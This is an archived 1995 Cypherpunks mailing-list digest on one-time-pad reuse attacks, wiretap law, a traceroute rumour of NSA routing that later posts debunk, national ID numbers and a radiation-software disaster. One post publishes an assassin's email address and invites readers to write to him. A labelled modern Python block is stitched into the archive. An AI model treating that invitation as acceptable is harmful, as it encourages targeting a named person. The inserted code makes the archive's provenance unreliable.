In-Reply-To: <199511050428.XAA06831@jekyll.piermont.com>
Message-ID:

On the subject of reused one-time-pads: What are the attacks that become available if a pad is used two times. The ones I can think of are:

known plaintext- if any parts of one message can be obtained or guessed, the corresponding parts of the other message are automatically obtained.

statistics- (m1^C)^(m2^C) == m1 ^ m2. If the message is English, then certain combinations of letters are more frequent than others. Try more probable combinations first.
Guess phrases - pick a common word - slide it down the m1^m2 text and see if the result looks like english - if it does, you've got a word in one, and a bunch of known text in another. The latter attack looks like it could be automated pretty well, and could run pretty fast, but I get the feeling I'm missing an obvious, better method. What's the standard way of attacking TTPs? What's the most secure way to reuse a OTP if (say) an emergency happens when you're on the road, and you're out of pad? Could you build a sequence of keys for something like DES from widely separated bits of the pad, and use each key for one block, or is this likely to expose the original OTPed message, as well as the successor messages? Simon From bdolan at use.usit.net Sat Nov 4 21:52:53 1995 From: bdolan at use.usit.net (Brad Dolan) Date: Sun, 5 Nov 1995 13:52:53 +0800 Subject: Telephone switch capacity -Reply In-Reply-To: Message-ID: On Sat, 4 Nov 1995, Lucky Green wrote: > At 18:43 11/3/95, Rich Graves wrote: > >[about the FBI supposedly wanting the ability to tap 1% of all phones in > >the US simultaneously] > > [...] > >Of course the FBI doesn't have the staff to listen to all these lines, and > >they need an individual court order to authorize each individual > >interception, so this numbers game is a bit of a joke. > > One more time. Despite what you read in the papers, despite what most > people - even in the legal profession - believe, telephone wiretaps do > _not_ require a court order. They haven't required a court order in over a > year. The Digital Telephony Bill, which passed Congress by an overwhelming > margin, _explicitly_ allows for wiretap authorizations other than a court > order. The law does not impose any rules for these "other forms of > authorization". > > "The captain signed it off" may suffice. And Clinton issued an executive order allowing Janet Reno (or her designees, I believe) to approve wiretaps. bd > > > -- Lucky Green > PGP encrypted mail preferred. 
> > > From nobody at REPLAY.COM Sat Nov 4 22:27:17 1995 From: nobody at REPLAY.COM (Anonymous) Date: Sun, 5 Nov 1995 14:27:17 +0800 Subject: lp (134.222.35.2)? Message-ID: <199511050620.HAA14046@utopia.hacktic.nl> I'm sure some of you will have seen this, so sorry to toss logs on the listburn fire; still, it seemed worth reposting to CP--no, it's not entirely crypto-related, but nor is it a completely vague allegation. >From GovAccess.183.snoops: > The following is the transcript of an actual communications trace that a > friend ran, while I was sitting next to him, watching -- reprinted here > with his permission. > > He did a "traceroute" of two messages that he sent from his machine in > Switzerland (he'd telneted into it while we were at a computer conference > in California). > > Traceroute automatically reports each Internet node through which a message > passes, as it proceeds from origin to destination. > > He did two traceroutes. The first was from Switzerland to an addressee at > Netcom in San Jose, California. The second was from Switzerland to an > addressee in Israel. 
>
>
> Date: Fri, 21 Apr 95 02:54:58 +0200
> From: kelvin at fourmilab.ch (John Walker)
> To: jwarren at well.com
> Subject: Traceroute
>
>
> /usr2/kelvin> traceroute netcom11.netcom.com
> traceroute to netcom11.netcom.com (192.100.81.121), 30 hops max, 40 byte packets
>  1 eunet-router (193.8.230.64) 2 ms 2 ms 2 ms
>  2 146.228.231.1 (146.228.231.1) 326 ms 345 ms 307 ms
>  3 Bern5.CH.EU.NET (146.228.14.5) 447 ms 408 ms 364 ms
>  4 146.228.107.1 (146.228.107.1) 127 ms 37 ms 36 ms
>  5 Zuerich1.CH.EU.NET (146.228.10.80) 37 ms 38 ms 175 ms
>  6 (134.222.9.1) 65 ms 109 ms 252 ms
>  7 lp (134.222.35.2) 196 ms 179 ms 405 ms
>  8 Vienna1.VA.ALTER.NET (137.39.11.1) 191 ms 179 ms 313 ms
>  9 fddi.mae-east.netcom.net (192.41.177.210) 336 ms 204 ms 303 ms
> 10 t3-2.dc-gw4-2.netcom.net (163.179.220.181) 182 ms 251 ms 187 ms
> 11 t3-2.chw-il-gw1.netcom.net (163.179.220.186) 305 ms 586 ms 518 ms
> 12 t3-2.scl-gw1.netcom.net (163.179.220.190) 537 ms 693 ms 797 ms
> 13 t3-1.netcomgw.netcom.net (163.179.220.193) 698 ms 549 ms 754 ms
> 14 netcom11.netcom.com (192.100.81.121) 890 ms 1922 ms 1696 ms
>
>
> /usr2/kelvin> traceroute jerusalem1.datasrv.co.il
> traceroute to jerusalem1.datasrv.co.il (192.114.21.101), 30 hops max, 40
> byte packets
>  1 eunet-router (193.8.230.64) 2 ms 3 ms 2 ms
>  2 146.228.231.1 (146.228.231.1) 933 ms 853 ms 874 ms
>  3 Bern5.CH.EU.NET (146.228.14.5) 1040 ms 450 ms 525 ms
>  4 146.228.107.1 (146.228.107.1) 453 ms 424 ms 188 ms
>  5 Zuerich1.CH.EU.NET (146.228.10.80) 64 ms 61 ms 47 ms
>  6 (134.222.9.1) 80 ms 312 ms 84 ms
>  7 lp (134.222.35.2) 270 ms 400 ms 216 ms
>  8 Vienna2.VA.ALTER.NET (137.39.11.2) 660 ms 1509 ms 886 ms
>  9 dataserv-gw.ALTER.NET (137.39.155.38) 1829 ms 1094 ms 1306 ms
> 10 orion.datasrv.co.il (192.114.20.22) 1756 ms 1280 ms 1309 ms
> 11 ...
>
>
> Notice that both messages went through an unnamed site -- 134.222.9.1 and
> then a strangely-named site, "lp (134.222.35.2)" -- then through the same
> Vienna, Virginia (USA) site ...
and thereafter, on to their destination. > I.e., the second message went through Virginia to get from Switzerland to > Israel. > > The whois servers at the InterNIC and at nic.ddn.mil for MILNET Information > report, ``No match for "134.222.9.1". '' and `` No match for > "134.222.35.2".'' > > Now let me see ... which spy agencies are located in or near Virginia? > > --jim From unicorn at polaris.mindport.net Sat Nov 4 22:37:56 1995 From: unicorn at polaris.mindport.net (Black Unicorn) Date: Sun, 5 Nov 1995 14:37:56 +0800 Subject: [NOISE, if interesting NOISE] Assassins Message-ID: Interested parties might want to discuss the effectiveness of murder in politics with the world's most recent assassin. Or at least leave interesting mail to the security forces who will likely be running through his e-mail. Here's your chance to make your life REAL interesting, and test PGP, just send some encrypted mail to our friend and gunman Mr. Amir at: la59 at popeye.cc.biu.ac.il --- "In fact, had Bancroft not existed, potestas scientiae in usu est Franklin might have had to invent him." in nihilum nil posse reverti 00B9289C28DC0E55 E16D5378B81E1C96 - Finger for Current Key Information From ses at tipper.oit.unc.edu Sat Nov 4 22:53:07 1995 From: ses at tipper.oit.unc.edu (Simon Spero) Date: Sun, 5 Nov 1995 14:53:07 +0800 Subject: lp (134.222.35.2)? In-Reply-To: <199511050620.HAA14046@utopia.hacktic.nl> Message-ID: On Sun, 5 Nov 1995, Anonymous wrote: > > Notice that both messages went through an unnamed site -- 134.222.9.1 and > > then a strangely-named site, "lp (134.222.35.2)" -- then through the same > > Vienna, Virginia (USA) site ... and thereafter, on to their destination. > > I.e., the second message went through Virginia to get from Switzerland to > > Israel. > > > > The whois servers at the InterNIC and at nic.ddn.mil for MILNET Information > > report, ``No match for "134.222.9.1". 
'' and `` No match for
> > "134.222.35.2".''

Yes, you've finally cottoned on to the secret NSA routing trick to cleverly tap all traffic. Really clever the way they use two hosts in the 132.222 Class B network. Strange that traffic from EUNET should be using that network, especially since it happens to be listed in the whois database as being NET-EUNET-X25.

::chivalry:ses$ whois -h rs.internic.net 134.222
::European Unix Users Group (NET-EUNET-X25)
:: Kruislaan 413
:: NL-1098 SJ Amsterdam
:: NETHERLANDS

From hua at xenon.chromatic.com Sat Nov 4 23:02:13 1995
From: hua at xenon.chromatic.com (Ernest Hua)
Date: Sun, 5 Nov 1995 15:02:13 +0800
Subject: lp (134.222.35.2)?
Message-ID: <199511050653.WAA17662@xenon.chromatic.com>

You don't really need a special (and clearly suspicious) IP address to perform driftnet fishing. All you need is to be sure that all physical packets pass through a checkpoint charlie and just park a sniffer there to watch everything fly by.

On the other hand, it would be interesting to see how hard NSA pushes behind the scenes to have physical long distance cables run through the US routers/switches (in the name of US national security, of course).

It would be fun (perhaps horrible) to see what the NSA does the first time Israel or France set up their own high capacity long distance to other friendly/unfriendly countries (thus bypassing the US completely). Second, let France or some other country set up major Internet routing clearinghouses which advertise secure routes to other nations (not US).

Ern

From reh at wam.umd.edu Sat Nov 4 23:05:10 1995
From: reh at wam.umd.edu (Richard Huddleston)
Date: Sun, 5 Nov 1995 15:05:10 +0800
Subject: lp (134.222.35.2)?
Message-ID: <199511050655.BAA18760@exp1.wam.umd.edu> 134.222.0.0 is a Class B network, so if you do 'whois' on 134.222.0.0 (instead of the individual IP addresses) you find: European Unix Users Group (NET-EUNET-X25) Kruislaan 413 NL-1098 SJ Amsterdam NETHERLANDS Netname: EUNET-X25 Netnumber: 134.222.0.0 Coordinator: EUnet Ltd (EU-NIC) hostmaster at nic.eu.net +31 20 5925109 +31 20 5925165 (24hr Emergency) +31 20 5925163 (fax) Domain System inverse mapping provided by: NS.EU.NET 192.16.202.11 SUNIC.SUNET.SE 192.36.125.2 192.36.148.18 NS.UU.NET 137.39.1.3 NS2.NIC.FR 192.93.0.4 Record last updated on 07-Mar-94. ...what does this do to your traceroute dumps? Richard From somogyi at digmedia.com Sat Nov 4 23:10:38 1995 From: somogyi at digmedia.com (Stephan Somogyi) Date: Sun, 5 Nov 1995 15:10:38 +0800 Subject: lp (134.222.35.2)? Message-ID: At 7:20 5.11.95, Anonymous wrote: > it seemed worth reposting to CP--no, it's not entirely crypto-related, > but nor is it a completely vague allegation. [...] > From GovAccess.183.snoops: [...] >> Notice that both messages went through an unnamed site -- 134.222.9.1 and >> then a strangely-named site, "lp (134.222.35.2)" -- then through the same >> Vienna, Virginia (USA) site ... and thereafter, on to their destination. >> I.e., the second message went through Virginia to get from Switzerland to >> Israel. >> >> The whois servers at the InterNIC and at nic.ddn.mil for MILNET Information >> report, ``No match for "134.222.9.1". '' and `` No match for >> "134.222.35.2".'' >> >> Now let me see ... which spy agencies are located in or near Virginia? Oh please. The probable reason that the InterNIC doesn't know about the 132.222.0.0 networks is because they're in Europe. If you search for either of the network numbers of the IP addresses mentioned above in the RIPE database , you will find that they belong to the EUnet backbone. 
After pinging 134.222.9.1 successfully, I telnetted to it and it claimed, quite plausibly, that it's a device (presumably a router) in Amsterdam. I am currently unable to ping 134.222.35.2; this, however, fills me with no dread whatsoever. _______________________________________________________________________ Stephan Somogyi Senior Editor Digital Media From anonymous-remailer at shell.portal.com Sat Nov 4 23:29:40 1995 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Sun, 5 Nov 1995 15:29:40 +0800 Subject: Sun speaks out - but not to the cypherpunks Message-ID: <199511050721.XAA14000@jobe.shell.portal.com> I know that it is rude to follow up one of your own posts, and I apologize in advance for this horrible faux-pas, but hopefully, it's excused this one time. I wrote: >One example of this that should serve as a useful case study is a recent >problem which was brought to the Canadian public's attention just this >week, on a program called the Fifth Estate. The CBC (Canadian >Broadcasting Corporation) detailed a software code problem in one of >AECL's (Atomic Energy of Canada Limited's) instruments which deliver >penetrating radiation. > >The software which controlled the radiation dose, would periodically >override the oncologist's calibration and deliver a radiation dose 100 >times what was prescribed. This software "bug" literally killed wherever >the machine was in use. Does anyone on this list know if the CBC has a web site on the Net? I'm hoping that someone (hint, hint) who has a convenient website, one with lots of spare bandwidth could volunteer to contact the CBC and persuade them to copyright clear the Fifth Estate program clip which documented some of the risks of software bugs in mission critical applications, and allow it to be placed on the Net. I'm hoping that this English language piece reaches a wide international audience. 
The Canadian Broadcasting Corporation is a Crown Corporation which has historically received its primary funding from the Government of Canada. Recently, it has suffered under the budgetary ax, and the push for privatization. I'm pretty confident that the Corporation would copyright clear the clip for MPEG distribution across the Net, if they were approached with the concept that the clip was a demonstration of the CBC's journalistic excellence and integrity, a piece which is demonstrative of the critical need to continue their funding. A concrete demonstration of the need for the CBC. And a piece which could well receive deserved international acclaim. The site would help them, and would simultaneously be a site of international public service. Nothing will drive home the need for quality software, quality code, and quality security more than the vivid graphic pictures of the consequences of sloppy code, or of the risks if certain critical systems, LANs, or private networks are compromised, or if security and privacy (which are flip sides of the same coin) are ignored. The sight of a body, that has had a hole burned straight through it from the front through to the spine is truly chilling and drives the message home. Nothing seems to speak as clearly as a picture ... as to what the stakes are ... of what "bugs" in code do ... and of what a network compromise can leave in its wake. A picture of consequences. Six people died in Canada and the United States due to the software flaw. Even after numerous reports of the flaws, the company refused to even acknowledge the existence of a problem, and in fact did everything within its power to make sure doctors, radiologists and physicists were unaware. The attitude of trivialization can only be characterized as fantastic, and would be unbelievable to anyone who has not viewed the piece. 
It's one hell of a backgrounder which not only details problems, but looks at solutions -- it examines attitudes, especially management attitudes. It truly deserves an expanded audience. From teachers, to students, to the international media, to the concerned private individual, all will be served well if this piece gets wide attention. Takers, anyone?? Alice de 'nonymous ... ...just another one of those... P.S. This post is in the public domain. C. S. U. M. O. C. L. U. N. E. From carolann at censored.org Sun Nov 5 00:22:53 1995 From: carolann at censored.org (Censored Girls Anonymous) Date: Sun, 5 Nov 1995 16:22:53 +0800 Subject: My Sympathies to you at this time. Message-ID: <199511050813.BAA08529@usr2.primenet.com> To those of you from Israel or who are Jewish, my deepest sympathies to all of you. Love Always, Carol Anne -- Member Internet Society - Certified BETSI Programmer - Webmistress *********************************************************************** Carol Anne Braddock (cab8) carolann at censored.org 206.42.112.96 My Homepage The Cyberdoc *********************************************************************** ------------------ PGP.ZIP Part [017/713] ------------------- M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M MF=O0H+*%(-S%&>S%+FS& http://dcs.ex.ac.uk/~aba/export/ From tcmay at got.net Sun Nov 5 00:24:59 1995 From: tcmay at got.net (Timothy C. May) Date: Sun, 5 Nov 1995 16:24:59 +0800 Subject: Credentials Without Identity Message-ID: I do not intend my comments below to be disrespectful to the people of Sweden. At 4:32 AM 11/5/95, Mats Bergstrom wrote: >Ah, the Swedish way is so much more convenient. Directly after birth you >get a tag around your arm, with a number that is later changed to an >entry into several databases, including 'Birth Registry' and you get >your Person Number for life, in the format YYMMDD-abcd, which is >unique (at least in Sweden). 
All forthcoming database entries are based
>on this number, usually as a first key field. Surprise immigrants get a

The Swedish way may be more convenient, but the Nazi way was even more convenient. The Person Numbers (or NonPerson Numbers, I suppose) were tattooed directly on the arms.

For many of us, the essence of strong crypto, crypto anarchy, and the Cypherpunks list is to avoid this "Swedish future." Truly a blight on mankind, if you ask me. The U.S is moving swiftly in this direction.

(Ironically, the foreign press clucks at our "fascism" with Proposition 187-type measures, while their own countries are far more restrictive in allowing immigration.)

Fortunately, I have heard there is a "right wing" backlash growing in some of the Scandinavian countries, especially Norway and Denmark. ("Right wing" is what the press calls it...I hope it's really "anti-left wing," anti-cradle-to-grave-socialism.)

>other person). Most Government databases are open to the public, so
>the credit tracking agencies don't have to work very hard regarding

The worst of both worlds: the government mandates that information be collected at every turn, then opens the records for all to see.

>Now, there are laws against cross-referencing various databases
>without the approval of the Data Inspection, which often says no.

To my surprise, several people on this list have expressed support for the need for so-called "data privacy laws." I look at it this way: if I put things on my computer based on things I have learned, or even compile lists of people and places, etc., who can enter my home and demand that I expunge these records?

The problem with well-intentioned laws about data privacy is that they impinge directly on the freedom to read and write, to make lists, to enter thoughts into computers, etc.

(I'm sure the _intent_ is to go after MasterCard-type operations and inaccurate records, but businesses in Britain are already facing investigation for having computerized mailing lists.
Ironically, the Cypherpunks mailing list might be illegal in the U.K. unless the legal forms were properly filled out, the fees paid, the parties notified on a regular basis of information about them, etc. And our archiving of posts is ipso facto illegal under several interpretations of the Data Privacy laws of some countries unless extensive notifications are made and permissions received. The Data Privacy laws make us all criminals for storing received messages in data bases.) More practically, giving a government the power to say which data bases are acceptable, and which data bases are illegal, is a terrible thing. Besides the opportunities for abuse (by a Stalin, a Nixon, a Pol Pot, a Clinton), it is also an impractical law to enforce, as Mats' next point makes: >But if you do it illegaly, there is very little risk of detection. >It looks like the Approved ID will be a smart-card with a signing >mechanism (probably escrowed), naturally linked to the Person Number, >real soon now, at least before the mythical y.2000 . Links to physical >characteristics (retina?) are not (openly) discussed yet but may >eventually come into play. ... And: >2) Prepare for Crypto Anarchy. Create untrackable net aliases for > future use. Keep informed of all the tricks to bypass coming > futile attempts to link net pseudonyms to Person Numbers (or > physical characteristics). Enjoy (and help create and protect) > the virtual sanctuary with digital mixes and anonymous http > proxies (and DC-nets or something better eventually). Sad, isn't it, that the world is rushing headlong into an Orwellian future. "Disneyland with a death penalty" ("Wired"--S. Sandfort, W. Gibson). --Tim May Views here are not the views of my Internet Service Provider or Government. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. 
May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From pat at falcon.inetw.net Sun Nov 5 00:53:19 1995 From: pat at falcon.inetw.net (Pat Billings) Date: Sun, 5 Nov 1995 16:53:19 +0800 Subject: My Sympathies to you at this time. In-Reply-To: <199511050813.BAA08529@usr2.primenet.com> Message-ID: We are *all* stunned at this senseless loss....even those of us who do not live in Israel or are not Jewish..... This is a great loss. Love, SuprSmile On Sun, 5 Nov 1995, Censored Girls Anonymous wrote: > To those of you from Israel or who are Jewish, > my deepest sympathies to all of you. > > Love Always, > > Carol Anne > > -- > > Member Internet Society - Certified BETSI Programmer - Webmistress > *********************************************************************** > Carol Anne Braddock (cab8) carolann at censored.org 206.42.112.96 > My Homepage > The Cyberdoc > *********************************************************************** > ------------------ PGP.ZIP Part [017/713] ------------------- > M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M > MF=O0H+*%(-S%&>S%+FS& MPGD ------------------------------------------------------------- > for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/ > > > From hallam at w3.org Sun Nov 5 01:00:10 1995 From: hallam at w3.org (hallam at w3.org) Date: Sun, 5 Nov 1995 17:00:10 +0800 Subject: Keyed-MD5, and HTTP-NG In-Reply-To: <9510018152.AA815258328@snail.rsa.com> Message-ID: <9511020101.AA05060@zorch.w3.org> On 11/1/95 10:20 AM, perry at piermont.com worte: > There were two names on the MD5 document -- mine and Bill > Simpson's. Bill didn't tell me that he was called (I suspect he > would have), and I wasn't called, either. 
We were the only two > editors of that portion of the specification. This appears to have been a problem from both ends. A number of people around here only heard about the IPsec work when it had reached the final call phase. There also seems to be a move towards looking at the question of how protocol and cryptography interact as a field in its own right. I think this highlights one of the problems with the IETF: we need a much broader infrastructure for understanding what progress other groups have made. The time when we can expect to do everything through email alone is past. I wish I could persuade more people in the IETF that the Web infrastructure could provide a valuable assistance as a collaboration tool for their needs. Unfortunately the approach seems to be that because there is a person living at the end of a 2400 baud modem in Vermont who cannot configure his PPP we should all continue in the stone age. We could improve readability of RFCs through using HTML and reduce the flamage on mailing lists through collaboration tools like the open meeting. But we don't because it hasn't been done that way in the past. I would like to see a collaboration system where I can present an expert with the context of a proposal very rapidly without expecting them to read the archives of an entire mailing list. Phill From s1113645 at tesla.cc.uottawa.ca Sun Nov 5 02:23:05 1995 From: s1113645 at tesla.cc.uottawa.ca (s1113645 at tesla.cc.uottawa.ca) Date: Sun, 5 Nov 1995 18:23:05 +0800 Subject: [noise, personal reply] CBC address. In-Reply-To: <199511050721.XAA14000@jobe.shell.portal.com> Message-ID: On Sat, 4 Nov 1995 anonymous-remailer at shell.portal.com wrote: > Does anyone on this list know if the CBC has a web site on the Net? They have a lot of shows in .au (so I hear) or accessible by realaudio. Don't know if they have any mpigs [sic] though. There's an alt newsgroup too.
You oughta use Sameer's (or someone else's) replyable remailer when asking questions Alice. From edge at got.net Sun Nov 5 03:10:40 1995 From: edge at got.net (Jay Campbell) Date: Sun, 5 Nov 1995 19:10:40 +0800 Subject: FBI seeks huge wiretapping system Message-ID: <199511041320.FAA12812@you.got.net> >It is a well-known fact that it was common practice for NSA operatives to > ^^^ >masquerade as Injuns in the 1800's and waylay Pony Express riders in order > ^^^^^^ >I think you'll find the NSA was not in existence in the 1800's. I'm disappointed at the sheer number of similar pieces of email I received on this. You'da thought the Capn Crunch reference was silly enough that people would give me a funny look and trash the original message. -- Jay Campbell edge at got.net - Operations Manager -=-=-=-=-=-=- Sense Networking, Santa Cruz Node Jay at Campbell.net got.net? PGP MIT KeyID 0xACAE1A89 "On the Information Superhighway, I'm the guy behind you in this morning's traffic jam leaning on his horn." From shields at tembel.org Sun Nov 5 03:17:23 1995 From: shields at tembel.org (Michael Shields) Date: Sun, 5 Nov 1995 19:17:23 +0800 Subject: lp (134.222.35.2)? In-Reply-To: <199511050620.HAA14046@utopia.hacktic.nl> Message-ID: <47i5na$24d@yage.tembel.org> In article <199511050620.HAA14046 at utopia.hacktic.nl>, Anonymous wrote: > I'm sure some of you will have seen this, so sorry to toss logs on the > listburn fire; still, it seemed worth reposting to CP--no, it's not > entirely crypto-related, but nor is it a completely vague allegation. It's specious. > > Notice that both messages went through an unnamed site -- 134.222.9.1 and > > then a strangely-named site, "lp (134.222.35.2)" Belonging to the EUnet backbone, apparently run by people who don't care much about DNS. Actually, I resolve 134.222.9.1 as `Amsterdam4.NL.EU.net'. I can ping it, but not 134.222.35.2. 134.222.35/24 also does not appear in the RIPE registry. 
I'm going to conclude that it was a temporary thing EUnet set up for some reason. It seems to have been replaced by amsterdam6, 134.222.228.13. > > -- then through the same > > Vienna, Virginia (USA) site ... ...a major router at a major interconnect run by UUNET, a major provider. datasrv apparently contracted with UUNET for traffic. Naturally it would go through their network, which is centered in the US. Why isn't the NSA tapping biu.ac.il, a central Israeli news site? Routing from Net99 to them is through IBM. > > The whois servers at the InterNIC and at nic.ddn.mil for MILNET Information > > report, ``No match for "134.222.9.1". '' and `` No match for > > "134.222.35.2".'' They are not comprehensive. You need to look up the network. This is silly. If the NSA were monitoring traffic with the consent of EUnet and UUNET (and note that EUnet is owned by UUNET rival PSI), they wouldn't need to play these routing games; they'd just eavesdrop at an interconnect or on the leased lines leading into it, run a rough filter over it to cut down volume, and tunnel the traffic home through other channels (probably satellite). And if they were monitoring without the consent of UUNET and EUnet, they still wouldn't play these games because the providers would be upset about the unexpected load on the expensive and overloaded transatlantic pipes. Finally, we all know how easy sniffing is at the local (LAN, ISP LAN, and especially telco) level. And we know that end-to-end encryption is the way to go. So what would we have learned if we knew the NSA was eavesdropping? Just *assume* the NSA is out to get you, design systems that resist attack, and then you can stop caring about whether you're the target. And tell your vendor you want Kerberos or IPSEC. -- Shields.
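[Added example, not part of the original post or of any tool mentioned in it: a sketch of the point made in the message above that a registry has to be asked about the network, not the individual router address. It assumes the pre-CIDR classful boundaries for the addresses in the thread; the 192.0.2.7 hop is a constructed sample, and the function names are hypothetical.]

```python
import ipaddress
from collections import defaultdict

# Hops named in the thread, plus one constructed hop (192.0.2.7, a
# documentation address) to show a network with no named sibling.
HOPS = [
    ("134.222.9.1", "Amsterdam4.NL.EU.net"),  # name as resolved in the reply
    ("134.222.35.2", "lp"),                   # unqualified name from the trace
    ("134.222.228.13", "amsterdam6"),         # unqualified, as written in the reply
    ("192.0.2.7", None),                      # constructed sample hop
]


def classful_network(addr):
    """Return the classful (pre-CIDR) network containing addr.

    Assumption: the registry record covers the whole class A/B/C network,
    so this is the object to query instead of the host address.
    """
    first_octet = int(ipaddress.IPv4Address(addr)) >> 24
    if first_octet < 128:
        prefix = 8       # class A
    elif first_octet < 192:
        prefix = 16      # class B
    elif first_octet < 224:
        prefix = 24      # class C
    else:
        raise ValueError(f"{addr} is class D/E, not a unicast network")
    return ipaddress.ip_network(f"{addr}/{prefix}", strict=False)


def is_attributable(name):
    """A name identifies an operator only if it is fully qualified."""
    return bool(name) and "." in name


def registry_queries(hops):
    """For every hop without a fully qualified name, return the network to
    look up and the qualified names of other hops inside that network."""
    by_net = defaultdict(list)
    for addr, name in hops:
        by_net[classful_network(addr)].append((addr, name))

    report = {}
    for net, members in by_net.items():
        named = sorted(n for _, n in members if is_attributable(n))
        for addr, name in members:
            if not is_attributable(name):
                report[addr] = {"query": str(net), "siblings": named}
    return report


if __name__ == "__main__":
    for addr, info in registry_queries(HOPS).items():
        print(addr, "-> look up", info["query"], "siblings:", info["siblings"])
```
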
From futplex at pseudonym.com Sun Nov 5 04:06:04 1995 From: futplex at pseudonym.com (Futplex) Date: Sun, 5 Nov 1995 20:06:04 +0800 Subject: FBI seeks huge wiretapping system In-Reply-To: <199511022239.RAA06803@jekyll.piermont.com> Message-ID: <199511030019.TAA19297@opine.cs.umass.edu> Today's (11/2) NYT carries a Markoff story on The 1% Solution at the top left of the front page. The article mentions that the DT appropriation has been cut out of the current budget bill (last week ?). It points out that since the White House officially plans to veto the current bill anyway, they're unlikely to waste too much effort on sticking things into it. Supposedly they want three zones of wiretap capability: (roughly) 1% in cities, 0.5% in suburbs, 0.25% in the country. We've discussed the grave concern that digital equipment makes everything much easier to handle. I would like to know what sort of technological assurances we could possibly obtain that the arbitrary 1%/0.5%/0.25% figures couldn't trivially be bumped up to, say, 10%/5%/2.5% with a little bit of programming. Is this a legitimate worry ? If the FBI gets its way on this, how far will we be from the day when 1% is merely a parameter in a wiretap control program ? I don't know enough about telephone switches etc. (digital or otherwise) to know whether this is just idle speculation. -Futplex From rah at shipwright.com Sun Nov 5 04:08:23 1995 From: rah at shipwright.com (Robert Hettinga) Date: Sun, 5 Nov 1995 20:08:23 +0800 Subject: e$: 24 Hours Message-ID: -----BEGIN PGP SIGNED MESSAGE----- e$: 24 Hours Yesterday, I had probably the most amazing day I've had in a very long time. As the day revolved around e$, strong crypto, cryptoanarchy, Macs and the life on the internet, I thought I would share it with you. 6:00 Got up before the alarm. Carol, my wife, dropped me off at the gym, where I hadn't set foot in about 6 months. Started up yet another new exercise program. 
Did a lot of big muscle stuff, like squats and deadlifts -- now I can't climb stairs so well for a while. Shaved off yet another unfinished goatee (3rd time in 6 weeks) because I had to be presentable in public today. 9:30 Showed up at the speaker's desk at Infoworld Boston, got credentialled and went to find David Fox's session on transaction methods. Had some time before, so I ran down to the floor and weaseled an Apple Internet guy named Tom Bartlett into shooting a picture of me with a QuickTake so that Vinnie Moscaritolo, another friend at Apple, wouldn't have a picture of him holding a scrawled sign saying "Bob: send me a GIF for this!" on the e$ web-page he's building for me at http://www.webstuff.apple.com/~vinnie/Rah/ . I had Tom e-mail the GIF to me from the floor, and ran back to the session, with 5 minutes to spare. The session got about 300 attendees, who listened to presentations from Pierre from First Virtual, Cliff from Open Market and Mike from Checkfree, and then I got to talk a bit. I had never spoken to a convention before, and here I was batting cleanup after all the pros pitched their stuff. David Fox introduced me as a "Wild Card", and I did my best to help him out. We were running late, but after asking them to get up and stretch after sitting through 2 hours of dog-and-pony, I asked the audience how many people people were from Boston, and told them about The Boston Society for Digital Commerce and when the meeting was. I then asked them how many of them had ever sold a car, and then asked them whether they took MasterCard from the buyer, and got a nice laugh. I told them that I thought that digital commerce *was* financial cryptography, and that most people settling trades on the net were just figuring that out. I told them to go out and buy Applied Cryptography by Schneier, and Out of Control by Kelley. I told them about the difference between certificate-based and book-entry transaction systems. 
I told them about Tim May's idea of Crypto-Anarchy, and about the Cypherpunks. Finally I asked them to imagine a world where instead of needing to enforce copyrights and patents, a developer's code would simply refuse to run periodically without a digital receipt saying that some specified amount had been paid, to the developer, preferrably in cash. I told them about Digicash, Mark Twain Bank, and about how important that was, even if it was a bumpy first start. At question-and-answer time, a guy from Germany asked us about the ITARs, regulatory restrictions on international transactions, and deutchmark-denominated business. All of the other presenters allowed that while that was hard, they had patches or were working on it, and that regulations were a problem. I talked about Eric Hughes' idea of regulatory arbitrage, how John Gilmore said that the internet saw censorship, and by extension arbitrary regulation, as damage, and routed around it, and I said that the folks at Mark Twain and Digicash had seen this as a problem and set up their system to be denominated in one of 5 currencies, including marks. I picked up about 10 cards from people who wanted to come to lunch at the Boston Society for Digital Commerce. (Plug: The first Tuesday of the month at the downtown Harvard Club. This month's speaker is Win Treese from Open Market, on how to design systems for digital commerce. E-mail me for details.) In addition, I saw BSDC member Dave Lash, a real-estate mogul turned web-fanatic who told me how to clean up my presentation style for next time. 2:00 After schmoozing, and trying to find a bank to cash a check. I met David Fox and his web guy (forgot your name, sorry) on the trade floor in front of the Netscape booth, which was about 20% the size of the IBM booth, and was blocking the aisles so much that the fire marshall was giving them grief for it. We then went to see Jim Phillips at Security First Network Bank. 
SFNB is in Atlanta, and while the likes of Citicorp and Chase were putting together proprietary, dial-up, bank-by-phone systems, Jim went ahead and did his stuff on the web for some rediculous fraction of their costs. They were the only bank there. They had this tiny booth way back in the corner, and they were also a fire marshall problem. Jim was talking to a guy from California somewhere about setting up an account right then and there. I told Jim to expect a visit from my anonymous digital signature law source "Irwin" , (for Irwin Cory, The World's Foremost Authority, RIP), who had asked me earlier in the week about SFNB, and how to get ahold of them. Then, David, who was the original Aldus and Radius distributor in Australia before moving here a few years ago, went around lining up sponsors for his WWW pre-tradeshow tradeshow which in turn evolved out of his tradeshow directory business. While we walked around, I talked to David some more about e$pam, my idea for building a group of three e$-mail lists (a filtered list of other e$-ralated sources, an unmoderated "watering hole", and a newsletter), and we agreed to talk more about it on Friday sometime. 3:00 Cashed a check from my first-ever writing sale, a longish rant entitled "The Geodesic Network, OpenDoc, and CyberDog", which originally was posted to apple-internet-users, was cross-posted by bunches of other people in the Mac world to other e-mail lists all over the place, got me fan mail from the likes of Kawasaki, Alsop, Petreley, and various Apple Vice Presidents, and was even cited in a New Zealand law journal. An editor from InfoWorld bashed it from a 20kb rant down to a feature article of about 1300 words, and it will appear this Monday in the November 6th issue. 4:00 Went to see a client, who is the CFO for a famous, er, beauty salon, with about 50 salons world wide. I sort of core-dumped at him about how someday he could send his e-mail his cash to the home office in London every night. 
